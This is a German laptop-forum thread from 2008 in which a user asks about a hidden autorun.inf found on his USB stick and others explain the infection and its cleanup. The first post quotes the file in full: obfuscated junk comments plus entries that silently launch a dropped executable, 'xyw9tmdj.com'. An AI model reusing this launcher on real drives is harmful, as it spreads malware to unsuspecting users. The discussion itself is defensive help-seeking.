Frage zu autorun malware

Dieses Thema im Forum "Allgemeine Softwarethemen" wurde erstellt von patrickmb, 03.09.2008.

  1. #1 patrickmb, 03.09.2008
    patrickmb

    patrickmb Forum Freak

    Dabei seit:
    09.05.2008
    Beiträge:
    191
    Zustimmungen:
    0
    Ort:
    Odenwald
    Mein Notebook:
    Dell Precision M2300
    Hallo zusammen

    Ich hab mal eine Frage zu malware.

    Geschichte:
    Gestern war ich bei einer Bekannten und hab ihr mit meinem USB Stick ein paar Dateien auf ihren Laptop überspielt. Soweit kein Problem.
    Heute steck ich den Stick in meinen Laptop und direkt kommt eine Anti-Vir Warnmeldung (Die genaue habe ich leider nicht mehr).
    Auf jeden fall war eine autorun.inf Datei auf meinem Stick (als Systemdatei versteckt). Deren Inhalt hab ich in eine harmlose Textdatei verschoben und die .inf gelöscht.

    Meine Frage:
    Könnte die Datei von dem anderen Laptop kommen oder war das nur Zufall, dass ich sie ausgerechnet heute entdeckt habe?
    Was macht sie? Insbesondere falls sie schon länger auf dem Laptop meiner Bekannten war. Ich vermute mal eine Internetadresse aufrufen und dann weiteres runterladen. Aber was?
    Wo könnte ich weitere Informationen darüber bekommen? Nach welchem Stichwort soll ich suchen?

    Ich kopiere den Inhalt der autorun.inf einfach mal hierrein und hoffe, dass ich damit nicht gegen irgendeine Forenregel verstoße:

    ;75oa5ld3dfawa39247q1k0djAoDrC24rp5Ls4la4id5ss5J92df
    [AutoRun]
    ;s3Lwl4cflZD4r0qDIie3lj8a8wUJi62LdFr7Jpfow2isDLjqH1kdKkSosajAaqs35flkj20sjawi0sCq1dJdArak9AsL3K2sirmiwel
    open=xyw9tmdj.com
    ;0aiwa0A5k1loo7rk
    shell\open\Command=xyw9tmdj.com
    ;e43Df9rl1dlie9L4ko1jdqsl4mko2SoSpkLeKe3q3s4KaD3widq5K4U2K8wnsk1CAddlkDw4caklA2iDj2
    shell\open\Default=1
    ;D4jIl4o4poS4okwSlkwJ4DeLeD3f1Klkjqiia2Uda3kSLiedslff5wdAs4wpHisp3aoCiD4l6krkoKJ5sisiqcakd3mKcsA7krA2KAeKik2LsLkk805jfDao91l33s
    shell\explore\Command=xyw9tmdj.com
    ;4wadrq

    Vielen Dank für Antworten schonmal im voraus.
    Grüße
    Patrick
     
  2. Anzeige

    Schau dir mal diese Kategorie an. Dort ist für jeden was dabei!
    Registrieren bzw. einloggen, um diese und auch andere Anzeigen zu deaktivieren
  3. #2 Brunolp12, 03.09.2008
    Brunolp12

    Brunolp12
    Moderator

    Dabei seit:
    06.11.2006
    Beiträge:
    11.497
    Zustimmungen:
    0
    Ort:
    Mittelfranken
    Mein Notebook:
    Thinkpad SL510 & iBrett
    ich kann dazu nix sagen, hab aber mal folgendes probiert:

    die Treffer bringen mich jetzt zwar nicht wirklich weiter, aber so ganz "nix" ists ja auch nicht - vielleicht magst Du ja tiefer eintauchen als ich Bock hab
     
  4. Gott

    Gott Ultimate Member

    Dabei seit:
    22.03.2005
    Beiträge:
    4.029
    Zustimmungen:
    0
    Ort:
    Österreich
    Mein Notebook:
    Maxdata Pro 8100X
    Diese Malware kenne ich, wobei ich nicht genau nachgeforscht habe, was sie macht. Wird die Autorun.inf jedoch nicht vom Antivirus geblockt, sondern ausgeführt, dann ist man infiziert. Leider fand man den Virus im letzten Jahr auf fast jedem Stick/Notebook und allgemein auf allen Wechseldatenträgern in meiner Umgebung.

    Wo befindet sich der Virus nach einer Infektion?
    - Auf jedem Laufwerk das beschreibbar ist findet man eine autorun.inf
    - Weiters wird eine lsass.exe (meistens heißt sie so) im RECYCLER Ordner abgelegt. c:\RECYCLER, d:\RECYCLER, ... (oder Systemdateien einblenden, dann siehst du ihn) Scanne also auch auf deinem USB Stick noch den Recycler Ordner, denn dort befindet sich der eigentliche Virus. Antivir hat bis jetzt nur die Datei für den automatischen Start gelöscht.
    - Sollte man infiziert sein (an den autorun.infs erkenntlich), ist ein Fullscan und ein eventueller Wechsel des Antivirenprogramms ratsam.

    -> Das ist ein Grund, warum ich für alle Laufwerke, außer dem CD Laufwerk, den Autorun deaktiviert habe.
     
  5. #4 patrickmb, 04.09.2008
    patrickmb

    patrickmb Forum Freak

    Dabei seit:
    09.05.2008
    Beiträge:
    191
    Zustimmungen:
    0
    Ort:
    Odenwald
    Mein Notebook:
    Dell Precision M2300
    Also vielen Dank für die Antworten.

    Ich hab jetzt mal alles durchsucht und scannen lassen und dabei nichts gefunden. Ich nehme jetzt einfach mal an, dass Antivir alles geblockt hat und mein PC nicht infiziert ist.

    Auf google hätte ich eigentlich auch selbst kommen können:eek:
    Hat aber eh nicht viel gebracht. Google findet zwar zeimlich viel, aber das meiste auf spanisch. Und die anderen Seiten, die ich mir zu dem Thema angeschaut fand ich nicht wirklich hilfreich.

    Naja. Zwei Fragen hab ich noch:
    Könnte dieser Virus die Internet/WLan Verbindung verlangsamen?
    Auf meinem USB Stick find ich keinen Recycler Ordner. Gibts den evtl. nur bei NTFS Laufwerken (USB Stick hat FAT)? Meine Festplatte(npartitionen) haben alle NTFS und da sehe ich diesen Ordner auch. Versteckte Dateien, Systemdateien anzeigen ist aktiviert.

    Autorun hab ich jetzt auch deaktiviert. Andernseits wars gut, dass er noch aktiviert war sonst hätte ich den Virus noch was weiß ich wo hingetragen.
     
  6. Gott

    Gott Ultimate Member

    Dabei seit:
    22.03.2005
    Beiträge:
    4.029
    Zustimmungen:
    0
    Ort:
    Österreich
    Mein Notebook:
    Maxdata Pro 8100X
    Wie gesagt, ich kenne den Virus nicht und kenne deshalb auch nicht seine Auswirkungen. Theoretisch könnte die Netzwerkverbindung durch Viren/Trojaner/Adware/... beeinträchtigt werden. Aber ich würde mir darüber keinen Kopf machen. Bei Wlan gibt es immer wieder Schwankungen ;).

    Stimmt, den gibts glaube ich erst seit NTFS. (hängt glaube ich mit den Zugriffsrechten zusammen, jeder Benutzer bekommt einen eigenen Recycler) Scan am besten den kompletten Stick und er sollte sauber sein.

    Normalerweise sannen Antivirusprogramme Systembereiche und co. von neuen Datenträgern. Mein Antivirusprogramm erkannte den Virus auch als der Autorun deaktiviert war.
     
  7. Anzeige

    Auf der Suche nach Notebook-Zubehör?
    Registrieren bzw. einloggen, um diese und auch andere Anzeigen zu deaktivieren
  8. #6 patrickmb, 05.09.2008
    Zuletzt bearbeitet: 05.09.2008
    patrickmb

    patrickmb Forum Freak

    Dabei seit:
    09.05.2008
    Beiträge:
    191
    Zustimmungen:
    0
    Ort:
    Odenwald
    Mein Notebook:
    Dell Precision M2300
    Bei der Frage nach dem WLan gings darum, dass die anderen drei in der Wohnung eine "normale" Geschwindigkeit haben und meine Bekannte nur eine seeeehr langsame (auch wenn nur einer die Verbindung nutzt und auch bei Kabel). Also hat sich der Virus da festgesetzt. Muss dann nochmal mit ihr reden.

    Den Stick hab ich natürlich direkt mitkontrolliert.

    Ich weiß nicht, wie mein Antivirenprogramm reagieren würde. Bisher hatte ich noch keine Probleme. Werde es aber nicht darauf anlegen bzw es ausprobieren.
     
  9. Gott

    Gott Ultimate Member

    Dabei seit:
    22.03.2005
    Beiträge:
    4.029
    Zustimmungen:
    0
    Ort:
    Österreich
    Mein Notebook:
    Maxdata Pro 8100X
    Also wenn die Verbindung auch per Lan langsam ist, dann könnte da durchaus etwas auf dem Rechner sein. Es kann aber auch an einem zugemüllten System liegen. ^^
     
Thema: Frage zu autorun malware
Besucher kamen mit folgenden Suchen
  1. content

Die Seite wird geladen...

Frage zu autorun malware - Ähnliche Themen

  1. Frage zu Ports Lifebook A Series?

    Frage zu Ports Lifebook A Series?: Ich habe eine Frage, ich besitze ein Fujitsu Lifebook und zwar eines aus der A series und ich mag oimmer wieder externe Geräte anstecken von Maus...
  2. Vostro Serie Frage zu einem dell v5459

    Frage zu einem dell v5459: Hallo zusammen, ich lebe in Taiwan, und möchte mir hier in Taiwan einen Dell v5459 mit 8G und einer SSD platte kaufen. Da ich aber viel Deutsch...
  3. 2 Nootebooks zur Auswahl - Fragen

    2 Nootebooks zur Auswahl - Fragen: hat sich erledigt.
  4. Bin an Dell Latitude E7450 (oder ähnlichem) interessiert - Ein paar Fragen.

    Bin an Dell Latitude E7450 (oder ähnlichem) interessiert - Ein paar Fragen.: Liebe Laptop Kenner, mein vorläufiger Wunsch-Laptop ist der Folgende: Dell Latitude E7450 Core i7 14" Zoll IPS-Panel (oder gleichwertig)...
  5. Frage zum Wert dieses Laptops

    Frage zum Wert dieses Laptops: Guten Tag, Ich suche kompetente Hilfe zur Frage, wieviel der untenstehen Laptop preislich Wert ist. Ich hoffe Ich bin hier richtig. zu den...